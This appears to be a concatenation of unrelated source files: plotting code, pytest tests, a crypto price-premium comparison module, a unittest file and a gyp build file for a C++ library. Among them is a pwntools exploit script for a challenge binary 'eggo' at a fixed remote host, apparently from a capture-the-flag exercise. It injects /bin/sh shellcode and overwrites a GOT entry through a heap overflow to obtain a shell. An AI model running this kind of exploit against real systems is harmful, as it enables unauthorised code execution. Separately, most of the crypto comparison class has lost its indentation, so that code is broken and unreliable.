            plt.scatter(_sample['SiO2'], _sample['TotalAlkalis'],
                        s=150, edgecolors='w', facecolors='red', marker='P',
                        label='User Data')
        if plot_type == 'xy':
            _sample = user_data.copy()
            plt.scatter(_sample[x], _sample[y],
                        s=150, edgecolors='w', facecolors='red', marker='P',
                        label='User Data')

    if legend:
        plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
    fig.tight_layout()
    if isinstance(save_fig, str):
        fig.savefig(save_fig)

    return fig, ax1
def show():
    """
    Local wrapper around ``matplotlib.pyplot.show`` for displaying any
    figures that have been created.
    """
    plt.show()
| 37,815 | 11,372 |
from dimep.tools import *
import numpy as np
import pytest
@pytest.mark.parametrize("binsize", np.arange(1.0, 20.0, 1.0))
def test_downbin(binsize):
    """down_bin over 0..99 should yield the centred bin positions."""
    signal = np.arange(0.0, 100.0, 1)
    if binsize == 1.0:
        expected = signal
    else:
        expected = np.arange((binsize - 1) / 2, 100.0 - binsize / 2, binsize)
    assert np.allclose(down_bin(signal, int(binsize)), expected)
def test_bwboundaries():
    """bw_boundaries labels each connected run of ones with a rising id."""
    cases = [
        ([0, 1, 1, 0], [0, 1, 1, 0]),
        ([0, 1, 1, 0, 1], [0, 1, 1, 0, 2]),
        ([1, 1, 1, 0, 1], [1, 1, 1, 0, 2]),
        ([1, 1, 1, 1, 1], [1, 1, 1, 1, 1]),
        ([1, 1, 0, 0, 1], [1, 1, 0, 0, 2]),
        ([1, 1, 0, 1, 0, 1], [1, 1, 0, 2, 0, 3]),
    ]
    for mask, expected in cases:
        assert np.allclose(bw_boundaries(mask), expected)
| 824 | 445 |
from dataclasses import dataclass

import cexdatacollect
import dfi_dex_prices
from symbols import CryptoExchangeSymbols
@dataclass
class SymbolPrice:
    """A symbol's last price as quoted on a specific exchange.

    Converted to a dataclass: same positional/keyword constructor and
    attributes as before, plus a useful __repr__ and value equality.
    """
    exchange_name: str
    symbol: str
    price: float
class IndirectComparison():
    """Premium of a DEX DFI price over a CEX DFI price.

    When ``intermediate_pair`` is given, the CEX DFI price is first
    converted through that pair. ``percentage`` holds the resulting price
    ratio, shifted by -1 (so 0.0 means parity) when
    ``percentage_minus_one`` is True.
    """
    def __init__(self, ex_name: str, cex_dfi_pair: SymbolPrice, dex_dfi_pair: SymbolPrice, intermediate_pair: SymbolPrice = None, percentage_minus_one: bool = True):
        self.ex_name: str = ex_name
        self.dex_dfi_pair = dex_dfi_pair
        self.cex_dfi_pair = cex_dfi_pair
        self.intermediate_pair = intermediate_pair
        # unify the two former copy-pasted branches: only the effective CEX
        # price differs (removed a leftover debug print as well)
        if intermediate_pair is None:
            effective_cex_price = cex_dfi_pair.price
        else:
            # convert the CEX DFI price through the intermediate pair
            effective_cex_price = cex_dfi_pair.price / intermediate_pair.price
        perc = dex_dfi_pair.price / effective_cex_price
        if percentage_minus_one:
            perc = perc - 1
        self.percentage: float = perc
class AggregatedComparison():
    """Direct DEX-vs-CEX price comparison for a single symbol."""
    def __init__(self, cex_name: str, symbol, cex_price, dex_price):
        self.cex_name: str = cex_name
        self.symbol: CryptoExchangeSymbols = symbol
        self.cex_price: float = cex_price
        self.dex_price: float = dex_price
        # premium of the DEX price relative to the CEX price (0.0 == parity)
        self.percentage: float = dex_price / cex_price - 1
class CryptoComparison():
all_pairs = []
def __init__(self, dex_data: dfi_dex_prices.DfiDexPrices, cex_data: cexdatacollect.CexPriceFetch):
self.dex_data = dex_data
self.cex_data = cex_data
def get_indirect_comparison(self, dfi_symbol: CryptoExchangeSymbols, intermediate_symbol: CryptoExchangeSymbols = None, inverse_intermediate_symbol: bool = False, inverse_cex_dfi_price: bool = True):
exchange_name = 'KuCoin'
dex_dfi_price = float(self.dex_data.dex_crypto_state_map[dfi_symbol.d_token()].data.price_ratio.ba)
if intermediate_symbol is not None:
intermediate_price = 1/float(self.cex_data.cex_price_state[exchange_name][intermediate_symbol.value]['last'])
if inverse_intermediate_symbol:
new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[0]}"
inverse_intermediate_symbol = f"{intermediate_symbol.value.split('/')[1]}/{intermediate_symbol.value.split('/')[0]}"
intermediate_pair = SymbolPrice(exchange_name, inverse_intermediate_symbol, intermediate_price)
else:
new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[1]}"
intermediate_pair = SymbolPrice(exchange_name, intermediate_symbol.value, intermediate_price)
cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][new_cex_symbol]['last'])
if inverse_cex_dfi_price:
cex_dfi_price = 1 / cex_dfi_price
cex_dfi_pair = SymbolPrice(exchange_name, new_cex_symbol, cex_dfi_price)
else:
intermediate_pair = None
cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][dfi_symbol.value]['last'])
if inverse_cex_dfi_price:
cex_dfi_price = 1 / cex_dfi_price
cex_dfi_pair = SymbolPrice(exchange_name, dfi_symbol.value, cex_dfi_price)
return IndirectComparison(
ex_name=exchange_name,
cex_dfi_pair=cex_dfi_pair,
dex_dfi_pair=SymbolPrice('dex', dfi_symbol.value, dex_dfi_price),
intermediate_pair=intermediate_pair,
percentage_minus_one=inverse_cex_dfi_price
)
def get_all_comparisons(self) -> [SymbolPrice]:
return [
self.get_indirect_comparison(CryptoExchangeSymbols.DFIBTC, None),
self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDT, None),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIETH, [CryptoExchangeSymbols.ETHBTC, CryptoExchangeSymbols.ETHUSDT]),
self.get_maximum_percentage(CryptoExchangeSymbols.DFILTC, [CryptoExchangeSymbols.LTCBTC, CryptoExchangeSymbols.LTCUSDT]),
#Something is wrong here!
#self.get_indirect_comparison(ExchangeSymbol.DFIUSDC, ExchangeSymbol.BTCUSDC, True, False),
self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDC, CryptoExchangeSymbols.USDTUSDC, True),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIBCH, [CryptoExchangeSymbols.BCHBTC, CryptoExchangeSymbols.BCHUSDT]),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIDOGE, [CryptoExchangeSymbols.DOGEBTC, CryptoExchangeSymbols.DOGEUSDT]),
]
def get_maximum_percentage(self, dfi_symbol: CryptoExchangeSymbols, intermediate_pairs: [CryptoExchangeSymbols]):
all_paths = []
percentages = []
for pair in intermediate_pairs:
path = self.get_indirect_comparison(dfi_symbol, pair)
all_paths.append(path)
percentages.append(abs(path.percentage))
index_of_highest_percentage = percentages.index(max(percentages))
return all_paths[index_of_highest_percentage]
def update_pairs(self):
self.all_pairs = self.get_all_comparisons()
def get_overview(self):
pairs: [SymbolPrice] = self.get_all_comparisons()
pair_text = []
for pair in sorted(pairs, key=lambda x: abs(x.percentage), reverse=True):
if pair.intermediate_pair is None:
text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name}:\t{round(pair.cex_dfi_pair.price, 3)} DFI
\t{round(pair.percentage*100, 2)} %
"""
else:
text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name} via {pair.intermediate_pair.symbol.split('/')[1]}:\t{round(pair.cex_dfi_pair.price / pair.intermediate_pair.price, 3)} DFI
\t{round(pair.percentage * 100, 2)} %
"""
pair_text.append(text)
single_pair_text_string = '\n'.join(pair_text)
return f" Current premium overview:\n{single_pair_text_string}"
def evaluate_alarm(self, symbol_name, threshold: float):
    """Return the cached pair for *symbol_name* if its premium crosses *threshold*.

    Args:
        symbol_name: Symbol string resolved via
            ``CryptoExchangeSymbols.from_string``.
        threshold: Alarm threshold; compared by absolute value, so the sign
            of both the premium and the threshold is ignored.

    Returns:
        The first matching pair whose ``abs(percentage)`` reaches the
        threshold, or ``None`` when no cached pair qualifies.
    """
    # The symbol lookup does not depend on the loop variable; resolve it
    # once instead of re-parsing it on every iteration as before.
    symbol = CryptoExchangeSymbols.from_string(symbol_name)
    for pair in self.all_pairs:
        if pair.dex_dfi_pair.symbol == symbol.value and abs(pair.percentage) >= abs(threshold):
            return pair
    return None
| 6,825 | 2,258 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 46.101.107.117 --port 2208 ./eggo
from pwn import *
# Set up pwntools for the correct architecture
# Load the target binary; assigning context.binary also configures
# pwntools (arch, bits, endianness) from the ELF headers.
exe = context.binary = ELF('./eggo')
# libc = ELF('./libc-2.33.so')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
# Remote target; override with HOST=... / PORT=... on the command line.
host = args.HOST or '46.101.107.117'
port = int(args.PORT or 2208)
def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    # Run under GDB when requested on the command line; otherwise spawn
    # a plain process. Extra args/kwargs are forwarded untouched.
    cmd = [exe.path] + argv
    if not args.GDB:
        return process(cmd, *a, **kw)
    return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    # argv is accepted only for signature parity with start_local; a
    # remote connection cannot pass arguments, so it is unused here.
    conn = connect(host, port)
    if args.GDB:
        gdb.attach(conn, gdbscript=gdbscript)
    return conn
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    # LOCAL on the command line selects a local process; default is remote.
    launcher = start_local if args.LOCAL else start_remote
    return launcher(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# GDB commands run when the exploit is launched with the GDB arg.
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
# Fixed address of the egg pointer table — usable directly because the
# binary is not position independent.
EGG = 0x004040e0
io = start()
# first allocate memory for egg 0,1,2
eggsize = 64
# bufsize models the allocator's real chunk size for the requested egg
# size, so offsets below land on the heap metadata following the data.
# NOTE(review): the exact rounding rule is inferred from the target
# allocator — confirm against the binary.
if eggsize % 8 != 0:
    bufsize = eggsize+8
else:
    bufsize = eggsize+16
io.recvuntil(b'> ')
# Menu option 1 = allocate an egg of the given size; done three times.
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
# io.sendline(b'1\n24')
# create shellcode, then edit egg 0
# NOP sled in front of a /bin/sh shellcode, padded to overflow into the
# adjacent chunk: two -8 size fields, then the strlen GOT slot and the
# value to write there (0x4052b0 — presumably the egg buffer holding the
# shellcode; verify against the binary's heap layout).
sc = asm('nop;'*16 + shellcraft.amd64.linux.sh())
payload = sc + (b'0' * (bufsize-len(sc)-16)) + p64(-8, sign = "signed") + p64(-8, sign = "signed") + p64(exe.got["strlen"]) + p64(0x4052b0)
print('Address of puts: ' , hex(exe.got["puts"]))
print('Address of strlen: ' , hex(exe.got["strlen"]))
# print('Address of puts: ' , p32(exe.got["puts"]))
# payload = cyclic(44, n=4)
# Menu option 4 = edit egg; edit egg 0 with the overflowing payload.
io.sendline(b'4\n0')
#io.sendline(b'0'*(bufsize-8) + p64(0x55))
#print(io.recvline())
#io.sendline(b'4\n1')
io.sendline(payload)
print(io.recvline())
# io.sendline(b'3\n0')
# print(io.recvline())
# io.sendline(b'3\n1')
# print(io.recvline())
# io.sendline(b'4\n1')
# io.sendline(b'make me crash')
# print(io.recvline())
# io.sendline(b'3\n0')
# print(io.recvline())
# io.sendline(b'3\n1')
# print(io.recvline())
# now delete egg 0 to execute the shellcode
# Menu option 2 = delete; the free path calls through the overwritten
# GOT entry, landing in the shellcode.
io.sendline(b'2\n1')
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
# Also dump the full interaction to a file for offline replay.
with open('payload', 'wb') as outF:
    outF.write(b'1\n%d\n1\n%d\n1\n%d\n'%(eggsize,eggsize,eggsize))
    outF.write(b'4\n0\n')
    outF.write(b'0'*(bufsize-8) + p64(0x54) + b'\n')
    outF.write(b'4\n1\n')
    outF.write(payload)
    outF.write(b'\n2\n1\n')
# log.info("Address of fullname: {}".format(hex(address)))
# log.info("Address of win(): {}".format(hex(exe.symbols["win"])))
# log.info("shellcode:\n{}".format(hexdump(shellcode)))
# payload = shellcode + ('B' * (664-len(shellcode))) + p32(100, sign = "signed") + p32(-4, sign = "signed") + p32(exe.got["puts"] - 12) + p32(address)
# log.info("payload:\n{}".format(hexdump(payload)))
# io.sendlineafter("Input fullname", payload)
# io.sendlineafter("Input lastname", "a")
#print(io.recvline())
io.interactive()
| 3,915 | 1,661 |
import unittest
class MyClass(object):
    """Toy class whose constructor only accepts foo == 1."""

    def __init__(self, foo):
        # Guard clause: the single permitted value passes straight through.
        if foo == 1:
            return
        raise ValueError("foo is not equal to 1!")
class MyClass2(object):
    """Toy class whose initializer takes no arguments and does nothing."""

    def __init__(self):
        pass  # intentionally empty
class TestFoo(unittest.TestCase):
    """Checks that the toy classes validate their constructor arguments."""

    def testInsufficientArgs(self):
        # foo must be exactly 1; anything else raises ValueError.
        with self.assertRaises(ValueError):
            MyClass(0)

    def testArgs(self):
        # MyClass2.__init__ takes no arguments, so passing one is a TypeError.
        with self.assertRaises(TypeError):
            MyClass2(("fsa", "fds"))
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
{
'variables': {
'bslmf_sources': [
'bslmf_addconst.cpp',
'bslmf_addcv.cpp',
'bslmf_addlvaluereference.cpp',
'bslmf_addpointer.cpp',
'bslmf_addreference.cpp',
'bslmf_addrvaluereference.cpp',
'bslmf_addvolatile.cpp',
'bslmf_arraytopointer.cpp',
'bslmf_assert.cpp',
'bslmf_conditional.cpp',
'bslmf_detectnestedtrait.cpp',
'bslmf_enableif.cpp',
'bslmf_forwardingtype.cpp',
'bslmf_functionpointertraits.cpp',
'bslmf_haspointersemantics.cpp',
'bslmf_if.cpp',
'bslmf_integralconstant.cpp',
'bslmf_isarithmetic.cpp',
'bslmf_isarray.cpp',
'bslmf_isbitwiseequalitycomparable.cpp',
'bslmf_isbitwisemoveable.cpp',
'bslmf_isclass.cpp',
'bslmf_isconst.cpp',
'bslmf_isconvertible.cpp',
'bslmf_isconvertibletoany.cpp',
'bslmf_isenum.cpp',
'bslmf_isfloatingpoint.cpp',
'bslmf_isfunction.cpp',
'bslmf_isfundamental.cpp',
'bslmf_isintegral.cpp',
'bslmf_islvaluereference.cpp',
'bslmf_ismemberfunctionpointer.cpp',
'bslmf_ismemberobjectpointer.cpp',
'bslmf_ismemberpointer.cpp',
'bslmf_ispair.cpp',
'bslmf_ispointer.cpp',
'bslmf_ispointertomember.cpp',
'bslmf_ispolymorphic.cpp',
'bslmf_isreference.cpp',
'bslmf_isrvaluereference.cpp',
'bslmf_issame.cpp',
'bslmf_istriviallycopyable.cpp',
'bslmf_istriviallydefaultconstructible.cpp',
'bslmf_isvoid.cpp',
'bslmf_isvolatile.cpp',
'bslmf_matchanytype.cpp',
'bslmf_matcharithmetictype.cpp',
'bslmf_memberfunctionpointertraits.cpp',
'bslmf_metaint.cpp',
'bslmf_nestedtraitdeclaration.cpp',
'bslmf_nil.cpp',
'bslmf_removeconst.cpp',
'bslmf_removecv.cpp',
'bslmf_removecvq.cpp',
'bslmf_removepointer.cpp',
'bslmf_removereference.cpp',
'bslmf_removevolatile.cpp',
'bslmf_selecttrait.cpp',
'bslmf_switch.cpp',
'bslmf_tag.cpp',
'bslmf_typelist.cpp',
],
'bslmf_tests': [
'bslmf_addconst.t',
'bslmf_addcv.t',
'bslmf_addlvaluereference.t',
'bslmf_addpointer.t',
'bslmf_addreference.t',
'bslmf_addrvaluereference.t',
'bslmf_addvolatile.t',
'bslmf_arraytopointer.t',
'bslmf_assert.t',
'bslmf_conditional.t',
'bslmf_detectnestedtrait.t',
'bslmf_enableif.t',
'bslmf_forwardingtype.t',
'bslmf_functionpointertraits.t',
'bslmf_haspointersemantics.t',
'bslmf_if.t',
'bslmf_integralconstant.t',
'bslmf_isarithmetic.t',
'bslmf_isarray.t',
'bslmf_isbitwiseequalitycomparable.t',
'bslmf_isbitwisemoveable.t',
'bslmf_isclass.t',
'bslmf_isconst.t',
'bslmf_isconvertible.t',
'bslmf_isconvertibletoany.t',
'bslmf_isenum.t',
'bslmf_isfloatingpoint.t',
'bslmf_isfunction.t',
'bslmf_isfundamental.t',
'bslmf_isintegral.t',
'bslmf_islvaluereference.t',
'bslmf_ismemberfunctionpointer.t',
'bslmf_ismemberobjectpointer.t',
'bslmf_ismemberpointer.t',
'bslmf_ispair.t',
'bslmf_ispointer.t',
'bslmf_ispointertomember.t',
'bslmf_ispolymorphic.t',
'bslmf_isreference.t',
'bslmf_isrvaluereference.t',
'bslmf_issame.t',
'bslmf_istriviallycopyable.t',
'bslmf_istriviallydefaultconstructible.t',
'bslmf_isvoid.t',
'bslmf_isvolatile.t',
'bslmf_matchanytype.t',
'bslmf_matcharithmetictype.t',
'bslmf_memberfunctionpointertraits.t',
'bslmf_metaint.t',
'bslmf_nestedtraitdeclaration.t',
'bslmf_nil.t',
'bslmf_removeconst.t',
'bslmf_removecv.t',
'bslmf_removecvq.t',
'bslmf_removepointer.t',
'bslmf_removereference.t',
'bslmf_removevolatile.t',
'bslmf_selecttrait.t',
'bslmf_switch.t',
'bslmf_tag.t',
'bslmf_typelist.t',
],
'bslmf_tests_paths': [
'<(PRODUCT_DIR)/bslmf_addconst.t',
'<(PRODUCT_DIR)/bslmf_addcv.t',
'<(PRODUCT_DIR)/bslmf_addlvaluereference.t',
'<(PRODUCT_DIR)/bslmf_addpointer.t',
'<(PRODUCT_DIR)/bslmf_addreference.t',
'<(PRODUCT_DIR)/bslmf_addrvaluereference.t',
'<(PRODUCT_DIR)/bslmf_addvolatile.t',
'<(PRODUCT_DIR)/bslmf_arraytopointer.t',
'<(PRODUCT_DIR)/bslmf_assert.t',
'<(PRODUCT_DIR)/bslmf_conditional.t',
'<(PRODUCT_DIR)/bslmf_detectnestedtrait.t',
'<(PRODUCT_DIR)/bslmf_enableif.t',
'<(PRODUCT_DIR)/bslmf_forwardingtype.t',
'<(PRODUCT_DIR)/bslmf_functionpointertraits.t',
'<(PRODUCT_DIR)/bslmf_haspointersemantics.t',
'<(PRODUCT_DIR)/bslmf_if.t',
'<(PRODUCT_DIR)/bslmf_integralconstant.t',
'<(PRODUCT_DIR)/bslmf_isarithmetic.t',
'<(PRODUCT_DIR)/bslmf_isarray.t',
'<(PRODUCT_DIR)/bslmf_isbitwiseequalitycomparable.t',
'<(PRODUCT_DIR)/bslmf_isbitwisemoveable.t',
'<(PRODUCT_DIR)/bslmf_isclass.t',
'<(PRODUCT_DIR)/bslmf_isconst.t',
'<(PRODUCT_DIR)/bslmf_isconvertible.t',
'<(PRODUCT_DIR)/bslmf_isconvertibletoany.t',
'<(PRODUCT_DIR)/bslmf_isenum.t',
'<(PRODUCT_DIR)/bslmf_isfloatingpoint.t',
'<(PRODUCT_DIR)/bslmf_isfunction.t',
'<(PRODUCT_DIR)/bslmf_isfundamental.t',
'<(PRODUCT_DIR)/bslmf_isintegral.t',
'<(PRODUCT_DIR)/bslmf_islvaluereference.t',
'<(PRODUCT_DIR)/bslmf_ismemberfunctionpointer.t',
'<(PRODUCT_DIR)/bslmf_ismemberobjectpointer.t',
'<(PRODUCT_DIR)/bslmf_ismemberpointer.t',
'<(PRODUCT_DIR)/bslmf_ispair.t',
'<(PRODUCT_DIR)/bslmf_ispointer.t',
'<(PRODUCT_DIR)/bslmf_ispointertomember.t',
'<(PRODUCT_DIR)/bslmf_ispolymorphic.t',
'<(PRODUCT_DIR)/bslmf_isreference.t',
'<(PRODUCT_DIR)/bslmf_isrvaluereference.t',
'<(PRODUCT_DIR)/bslmf_issame.t',
'<(PRODUCT_DIR)/bslmf_istriviallycopyable.t',
'<(PRODUCT_DIR)/bslmf_istriviallydefaultconstructible.t',
'<(PRODUCT_DIR)/bslmf_isvoid.t',
'<(PRODUCT_DIR)/bslmf_isvolatile.t',
'<(PRODUCT_DIR)/bslmf_matchanytype.t',
'<(PRODUCT_DIR)/bslmf_matcharithmetictype.t',
'<(PRODUCT_DIR)/bslmf_memberfunctionpointertraits.t',
'<(PRODUCT_DIR)/bslmf_metaint.t',
'<(PRODUCT_DIR)/bslmf_nestedtraitdeclaration.t',
'<(PRODUCT_DIR)/bslmf_nil.t',
'<(PRODUCT_DIR)/bslmf_removeconst.t',
'<(PRODUCT_DIR)/bslmf_removecv.t',
'<(PRODUCT_DIR)/bslmf_removecvq.t',
'<(PRODUCT_DIR)/bslmf_removepointer.t',
'<(PRODUCT_DIR)/bslmf_removereference.t',
'<(PRODUCT_DIR)/bslmf_removevolatile.t',
'<(PRODUCT_DIR)/bslmf_selecttrait.t',
'<(PRODUCT_DIR)/bslmf_switch.t',
'<(PRODUCT_DIR)/bslmf_tag.t',
'<(PRODUCT_DIR)/bslmf_typelist.t',
],
'bslmf_pkgdeps': [
'../bsls/bsls.gyp:bsls',
'../bslscm/bslscm.gyp:bslscm',
],
},
'targets': [
{
'target_name': 'bslmf_sources',
'type': 'none',
'direct_dependent_settings': {
'sources': [ '<@(bslmf_sources)' ],
'include_dirs': [ '.' ],
},
},
{
'target_name': 'bslmf_tests_build',
'type': 'none',
'dependencies': [ '<@(bslmf_tests)' ],
},
{
'target_name': 'bslmf_tests_run',
'type': 'none',
'dependencies': [ 'bslmf_tests_build' ],
'sources': [ '<@(bslmf_tests_paths)' ],
'rules': [
{
'rule_name': 'run_unit_tests',
'extension': 't',
'inputs': [ '<@(bslmf_tests_paths)' ],
'outputs': [ '<(INTERMEDIATE_DIR)/<(RULE_INPUT_ROOT).t.ran' ],
'action': [ '<(python_path)', '<(DEPTH)/tools/run_unit_tests.py',
'<(RULE_INPUT_PATH)',
'<@(_outputs)',
'--abi=<(ABI_bits)',
'--lib=<(library)'
],
'msvs_cygwin_shell': 0,
},
],
},
{
'target_name': 'bslmf',
'type': '<(library)',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)',
'bslmf_sources', ],
'export_dependent_settings': [ '<@(bslmf_pkgdeps)' ],
'direct_dependent_settings': { 'include_dirs': [ '.' ] },
      # On Mac OS X, an empty LD_DYLIB_INSTALL_NAME causes executables and
      # shared libraries that link against the dylib to store the same path
      # for use at runtime.
'xcode_settings': { 'LD_DYLIB_INSTALL_NAME': '' },
},
{
'target_name': 'bslmf_addconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addconst.t.cpp' ],
},
{
'target_name': 'bslmf_addcv.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addcv.t.cpp' ],
},
{
'target_name': 'bslmf_addlvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addlvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_addpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addpointer.t.cpp' ],
},
{
'target_name': 'bslmf_addreference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addreference.t.cpp' ],
},
{
'target_name': 'bslmf_addrvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addrvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_addvolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addvolatile.t.cpp' ],
},
{
'target_name': 'bslmf_arraytopointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_arraytopointer.t.cpp' ],
},
{
'target_name': 'bslmf_assert.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_assert.t.cpp' ],
},
{
'target_name': 'bslmf_conditional.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_conditional.t.cpp' ],
},
{
'target_name': 'bslmf_detectnestedtrait.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_detectnestedtrait.t.cpp' ],
},
{
'target_name': 'bslmf_enableif.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_enableif.t.cpp' ],
},
{
'target_name': 'bslmf_forwardingtype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_forwardingtype.t.cpp' ],
},
{
'target_name': 'bslmf_functionpointertraits.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_functionpointertraits.t.cpp' ],
},
{
'target_name': 'bslmf_haspointersemantics.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_haspointersemantics.t.cpp' ],
},
{
'target_name': 'bslmf_if.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_if.t.cpp' ],
},
{
'target_name': 'bslmf_integralconstant.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_integralconstant.t.cpp' ],
},
{
'target_name': 'bslmf_isarithmetic.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isarithmetic.t.cpp' ],
},
{
'target_name': 'bslmf_isarray.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isarray.t.cpp' ],
},
{
'target_name': 'bslmf_isbitwiseequalitycomparable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isbitwiseequalitycomparable.t.cpp' ],
},
{
'target_name': 'bslmf_isbitwisemoveable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isbitwisemoveable.t.cpp' ],
},
{
'target_name': 'bslmf_isclass.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isclass.t.cpp' ],
},
{
'target_name': 'bslmf_isconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconst.t.cpp' ],
},
{
'target_name': 'bslmf_isconvertible.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconvertible.t.cpp' ],
},
{
'target_name': 'bslmf_isconvertibletoany.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconvertibletoany.t.cpp' ],
},
{
'target_name': 'bslmf_isenum.t',
'type': 'executable',
